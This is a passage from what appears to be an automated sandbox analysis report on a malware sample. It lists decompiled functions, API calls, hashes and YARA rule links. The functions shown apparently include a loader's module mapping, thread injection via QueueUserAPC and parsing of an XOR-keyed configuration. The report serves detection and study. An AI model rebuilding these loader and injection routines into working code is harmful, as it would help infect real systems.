Instruction Fuzzy Hash: 1FF05466600305BEEB21D69E8C00EAF76FCEBC5660F150055A504E7144EA71DF019770

Uniqueness

Uniqueness Score: -1.00%

Function 03C47EFD, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x3c4d23c) == 0) {
						E03C44DB1();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x3c4d23c) == 1) {
						_t10 = E03C42789(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x03c47f04
0x03c47f05
0x03c47f08
0x03c47f3a
0x03c47f3c
0x03c47f3c
0x03c47f0a
0x03c47f0b
0x03c47f20
0x03c47f27
0x03c47f29
0x03c47f29
0x03c47f27
0x03c47f0b
0x03c47f44

APIs

InterlockedIncrement.KERNEL32(03C4D23C), ref: 03C47F12

Part of subcall function 03C42789: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,03C47F25,?), ref: 03C4279C

InterlockedDecrement.KERNEL32(03C4D23C), ref: 03C47F32

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: c84b86fcd0cb92eb8d6dd1c2fb186b538f4919fe8bcbfd58d8043e68b889b884
Instruction ID: 7ff49a7780a66215765ca2b78eb8305eb190d884926a747f072a17e505e45b3a
Opcode Fuzzy Hash: c84b86fcd0cb92eb8d6dd1c2fb186b538f4919fe8bcbfd58d8043e68b889b884
Instruction Fuzzy Hash: 93E08635208332A7EB35F675DC48B6EA6549B10780F0A94A4F4B2D9055D711CD6092D5

Uniqueness

Uniqueness Score: -1.00%

Function 01FE0DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,01FE0223,?,?), ref: 01FE0E02
SetErrorMode.KERNELBASE(00000000,?,?,01FE0223,?,?), ref: 01FE0E07

Memory Dump Source

Source File: 00000000.00000002.517164137.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FE0000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4c2d71d4cb806fde6006f144d51697ff0c86b5d0c67d519f38fd31899337c618
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 85D0123164522CB7D7002A94DC0DBCD7F5CDF05B66F008021FB0DD9181CBB1994046E5

Uniqueness

Uniqueness Score: -1.00%

Function 03C4933A, Relevance: 1.6, APIs: 1, Instructions: 70
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C4933A(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x3c4d2c8; // 0x4759618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E03C48C01( &_v68) == 0) {
						goto L16;
					}
					_t30 = E03C497F7(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E03C45988(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E03C4D000 = E03C4D000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E03C458DB( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x3c4d26c, 0) == 0x102);
				return _t30;
			}

0x03c4933a
0x03c49340
0x03c49347
0x03c4934f
0x03c49355
0x03c49358
0x03c4935a
0x03c4935a
0x03c49362
0x03c49362
0x03c4936c
0x00000000
0x00000000
0x03c4937b
0x03c4937f
0x03c49383
0x03c49388
0x03c4938c
0x03c493c8
0x03c493ca
0x03c493ca
0x03c4938e
0x03c49395
0x03c493bf
0x03c49397
0x03c49397
0x03c4939c
0x03c493b8
0x03c4939e
0x03c4939e
0x03c493a3
0x03c493a8
0x03c493ab
0x03c493ad
0x03c493b2
0x03c493b4
0x03c493b4
0x03c493b2
0x03c493a3
0x03c4939c
0x03c49395
0x03c4938c
0x03c493d7
0x03c493dc
0x03c493dc
0x03c49400

APIs

WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 03C493EC

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: cef0390ae92ee543b84c1ba43c9a3bb67a8fd53bc0a0f08467144ce6c164307d
Instruction ID: 5c30bb3ada5c8be71f8b33592b945ef6ca2d30b00a292fbdc31442b89124f5a7
Opcode Fuzzy Hash: cef0390ae92ee543b84c1ba43c9a3bb67a8fd53bc0a0f08467144ce6c164307d
Instruction Fuzzy Hash: 2521903A7002299BDF11EE59D854B6FB7B5AB82364F194125E402EF2D0EB70DD41C750

Uniqueness

Uniqueness Score: -1.00%

Function 03C41037, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E03C41037(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x3c4d2a8; // 0xb0a5a8
				_t4 = _t15 + 0x3c4e39c; // 0x4758944
				_t20 = _t4;
				_t6 = _t15 + 0x3c4e124; // 0x650047
				_t17 = E03C476E7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E03C47EA4(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x03c41041
0x03c41048
0x03c41049
0x03c4104a
0x03c4104b
0x03c41051
0x03c41056
0x03c41056
0x03c41060
0x03c41072
0x03c41079
0x03c410a7
0x03c4107b
0x03c4107d
0x03c41082
0x03c410a4
0x03c41084
0x03c41087
0x03c4108e
0x03c41093
0x03c41095
0x03c41095
0x03c4109a
0x03c4109a
0x03c41082
0x03c410ae

APIs

Part of subcall function 03C476E7: SysFreeString.OLEAUT32(?), ref: 03C477C6

Part of subcall function 03C47EA4: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,03C451D4,004F0053,00000000,?), ref: 03C47EAD
Part of subcall function 03C47EA4: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,03C451D4,004F0053,00000000,?), ref: 03C47ED7
Part of subcall function 03C47EA4: memset.NTDLL ref: 03C47EEB

SysFreeString.OLEAUT32(00000000), ref: 03C4109A

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 1313e7baa0fd82f7cdea57594fb825d65845778a1db75b12174bcb6a7bf693d6
Instruction ID: ca29436b4b19cbca894d3e1c007738ec249dc79fc11170b5057f6f2d5fdd4932
Opcode Fuzzy Hash: 1313e7baa0fd82f7cdea57594fb825d65845778a1db75b12174bcb6a7bf693d6
Instruction Fuzzy Hash: 8601BC36900119BFDB12EFAACC00EAABBB9FB04240F054166EE40E7020E371AD51C790

Uniqueness

Uniqueness Score: -1.00%

Function 00419B3C, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00419B9A

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 141070658d78ade838dcfdee5f25a4b0fae43cdc9ca8b4750ae202ba536ad394
Instruction ID: 005cb779623e195d5beee851539c561774c21eedf2e4b4683fecb4d1dcf53091
Opcode Fuzzy Hash: 141070658d78ade838dcfdee5f25a4b0fae43cdc9ca8b4750ae202ba536ad394
Instruction Fuzzy Hash: 660128B5A00108EBDB04DF99D991A9E73B5AB88310F10C549F91D8B240D734EE50CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0042E5D0, Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(01FB4154,01FB4264,00000040,?), ref: 0042E671

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 782cb7d2ca3ee20e7e6cff5ccdb78166563dbaf83a70bbddc1419215a8da6bff
Instruction ID: 6b58bed668907d67a4f6327d2989970334895a136cd1234a7a830e2aea916f5e
Opcode Fuzzy Hash: 782cb7d2ca3ee20e7e6cff5ccdb78166563dbaf83a70bbddc1419215a8da6bff
Instruction Fuzzy Hash: 190178B0208280EED301CF60BE86B513BB4EF94303F20712DE0425B2B1DB742600DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040136F, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040136F(void* __eax, intOrPtr _a4) {

				 *0x403110 =  *0x403110 & 0x00000000;
				_push(0);
				_push(0x40310c);
				_push(1);
				_push(_a4);
				 *0x403108 = 0xc; // executed
				L00401746(); // executed
				return __eax;
			}

0x0040136f
0x00401376
0x00401378
0x0040137d
0x0040137f
0x00401383
0x0040138d
0x00401392

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013F1,00000001,0040310C,00000000), ref: 0040138D

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 1a6a7a0cbcb211806d4e421c93ccdd2d337a60f7500ba4ce8895fb39eafca520
Instruction ID: 17493d3f587428f8fefc298e6e1fa5166c11f7a8d69dd9124bb4eb41bc27f639
Opcode Fuzzy Hash: 1a6a7a0cbcb211806d4e421c93ccdd2d337a60f7500ba4ce8895fb39eafca520
Instruction Fuzzy Hash: 53C04C74144310A7E6109F009D46F457E557759706F204529B1103D1E183F95254895D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B970, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,?,004187BB,?,?,0041BAE0), ref: 0041B977

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 9f1490e2d7872debaa62d2e4c556c62dc76850be9ac2e48038d116ed34697fa0
Instruction ID: 202ab8b62ff2e8de260377b3af1900366c942f43d59ee30826b97b9fc58c2c36
Opcode Fuzzy Hash: 9f1490e2d7872debaa62d2e4c556c62dc76850be9ac2e48038d116ed34697fa0
Instruction Fuzzy Hash: 53A0123104430863D60013826809B417A4CC3C0721F000010F90C02451097154004065

Uniqueness

Uniqueness Score: -1.00%

Function 03C48B22, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C48B22(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x3c4d238, 0, _a4); // executed
				return _t2;
			}

0x03c48b2e
0x03c48b34

APIs

RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f4413c6840f30e464c200a4ca7779d6e29cfefc878f7ea9493b5c953216420b4
Instruction ID: f9484108d066a6ac82dcde79c43b3940ca82a017c4b86f87975160d9fd140260
Opcode Fuzzy Hash: f4413c6840f30e464c200a4ca7779d6e29cfefc878f7ea9493b5c953216420b4
Instruction Fuzzy Hash: C6B01279100100BBCB217F50DE08F05FA21AB50700F008010F3068407887325C20FB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401D7E, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401D7E(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x403100;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x69b24f45 &  !( *0x403100 - 0x69b24f45);
				_t18 = E00401000( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x69b24f45 &  !( *0x403100 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x69b24f45 &  !( *0x403100 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E004010E4(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00401264(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E00401BAE(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E004017CB(_t42);
					L8:
					return _t29;
				}
			}

0x00401d86
0x00401d88
0x00401da4
0x00401db5
0x00401dbc
0x00401e1a
0x00000000
0x00401dbe
0x00401dbe
0x00401dc8
0x00401dcc
0x00401dd1
0x00401dd4
0x00401dd9
0x00401ddd
0x00401de2
0x00401de7
0x00401deb
0x00401df0
0x00401df1
0x00401df5
0x00401dfa
0x00401e02
0x00401e02
0x00401dfa
0x00401deb
0x00401ddd
0x00401e04
0x00401e0d
0x00401e11
0x00401e1b
0x00401e21
0x00401e21

APIs

Part of subcall function 00401000: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401DBA,?,?,?,?,?,00000002,?,?), ref: 00401024
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 00401046
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 0040105C
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 00401072
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 00401088
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 0040109E

Part of subcall function 004010E4: memcpy.NTDLL(00000002,?,00401DC8,?,?,?,?,?,00401DC8,?,?,?,?,?,?,?), ref: 0040111B
Part of subcall function 004010E4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00401150

Part of subcall function 00401264: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 0040129C

Part of subcall function 00401BAE: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401BE7
Part of subcall function 00401BAE: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401C5C
Part of subcall function 00401BAE: GetLastError.KERNEL32 ref: 00401C62

GetLastError.KERNEL32(?,?), ref: 00401DFC

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 8731538ceb2d12050e79bcb7b22b00ca6da66f24cf0d43321f952fe27491e5f4
Instruction ID: e7e1ad0c5ae7c8012b4b43df85cfbbfbb8c05be311c934117461263c8cc71cd7
Opcode Fuzzy Hash: 8731538ceb2d12050e79bcb7b22b00ca6da66f24cf0d43321f952fe27491e5f4
Instruction Fuzzy Hash: E811E936600301ABD721AA95CD80DEF77BCAF88318700017EFB01B7691EAB4ED0587D4

Uniqueness

Uniqueness Score: -1.00%

Function 03C45D79, Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C45D79(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E03C47DDD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x3c4d238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E03C41037(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x03c45d79
0x03c45d81
0x03c45d98
0x03c45db3
0x03c45db7
0x03c45dbc
0x03c45dbe
0x03c45dd0
0x03c45ddc
0x03c45dc0
0x03c45dc0
0x03c45dc5
0x03c45dca
0x03c45dca
0x03c45dbe
0x03c45de2
0x03c45de6
0x03c45de6
0x03c45d8d
0x03c45d92
0x03c45d96
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 03C41037: SysFreeString.OLEAUT32(00000000), ref: 03C4109A

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7519F710,?,00000000,?,00000000,?,03C45356,?,004F0053,04759368,00000000,?), ref: 03C45DDC

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: a95f92c20e2d8c31fc9226fcaf08abae8e736f8e3b2d0f7a67bc7d2e06732371
Instruction ID: 5fa4788105bfca533572acdc65b94dcea22a03cf0cd827740943cef49ca8e12e
Opcode Fuzzy Hash: a95f92c20e2d8c31fc9226fcaf08abae8e736f8e3b2d0f7a67bc7d2e06732371
Instruction Fuzzy Hash: B6012836100619BBCB22DE54CC04FEE7B65EF04790F098025FA09DE120D731DA60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0042E5B0, Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,01FB4264,0042F6CE), ref: 0042E5B8

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: c866dd67d46a662cb26efd7e2e2d1f1bf081687ca6cd9af6b3686c8412a9d681
Instruction ID: 02ff169c2bcaba9242ef57989b002877965e4d2950505e3d7326f7fc0d8de085
Opcode Fuzzy Hash: c866dd67d46a662cb26efd7e2e2d1f1bf081687ca6cd9af6b3686c8412a9d681
Instruction Fuzzy Hash: CBB012B06063149FD7108F50EFC9B103764E348302F000010F652D526DC73004009B14

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01FE1BF0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140threadsleepnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 01FE19A2: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,01FE1BFC), ref: 01FE19B1
Part of subcall function 01FE19A2: GetVersion.KERNEL32(?,01FE1BFC), ref: 01FE19C0
Part of subcall function 01FE19A2: GetCurrentProcessId.KERNEL32(?,01FE1BFC), ref: 01FE19DC
Part of subcall function 01FE19A2: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01FE1BFC), ref: 01FE19F5

Part of subcall function 01FE193E: RtlAllocateHeap.NTDLL(00000000,?,01FE125E), ref: 01FE194A

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 01FE1C2F
Sleep.KERNEL32(00000000,00000030), ref: 01FE1C76
CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 01FE1CED
QueueUserAPC.KERNEL32(004013C4,00000000,?), ref: 01FE1D09
TerminateThread.KERNEL32(00000000,00000000), ref: 01FE1D20
SetLastError.KERNEL32(?), ref: 01FE1D2E
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01FE1D3B
GetExitCodeThread.KERNEL32(00000000,00000008), ref: 01FE1D4D

Strings

0, xrefs: 01FE1C44

Memory Dump Source

Source File: 00000000.00000002.517164137.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FE0000, based on PE: false

Similarity

API ID: Thread$CreateProcess$AllocateCodeCurrentErrorEventExitHeapInformationLastObjectOpenQueryQueueSingleSleepSystemTerminateUserVersionWait
String ID: 0
API String ID: 2149924089-4108050209
Opcode ID: 0c3b4c9d1acedc47557413de4ec6e7ea767d40e5cabb3ca1ff8d70de26bf0a83
Instruction ID: 8737bd75cfcd1113644dce941bdaed3a0888968dd0b687806a17b4940a493ac1
Opcode Fuzzy Hash: 0c3b4c9d1acedc47557413de4ec6e7ea767d40e5cabb3ca1ff8d70de26bf0a83
Instruction Fuzzy Hash: 53417571D04619FFDB21AFAA8E8C9EEBBFCEF09214B104176E601E3150D7758A44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 03C47FBE, Relevance: 12.3, APIs: 8, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E03C47FBE(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x3c4d2a4; // 0x69b25f44
				if(E03C46247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
					 *0x3c4d2d8 = _v8;
				}
				_t33 =  *0x3c4d2a4; // 0x69b25f44
				if(E03C46247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x3c4d2a4; // 0x69b25f44
				if(E03C46247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x3c4d238, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x3c4d2a4; // 0x69b25f44
						_t45 = E03C49403(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x3c4d240 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x3c4d2a4; // 0x69b25f44
						_t46 = E03C49403(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x3c4d244 = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x3c4d2a4; // 0x69b25f44
						_t47 = E03C49403(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x3c4d248 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x3c4d2a4; // 0x69b25f44
						_t48 = E03C49403(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x3c4d004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x3c4d2a4; // 0x69b25f44
						_t49 = E03C49403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x3c4d02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x3c4d2a4; // 0x69b25f44
						_t50 = E03C49403(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x3c4d24c = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x3c4d2a4; // 0x69b25f44
								_t51 = E03C49403(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E03C4A0FD(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E03C49FF6();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x3c4d2a4; // 0x69b25f44
								_t52 = E03C49403(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E03C4A0FD(0, _t52) != 0) {
								_t121 =  *0x3c4d32c; // 0x47595b0
								E03C41128(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x3c4d2a4; // 0x69b25f44
								_t53 = E03C49403(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
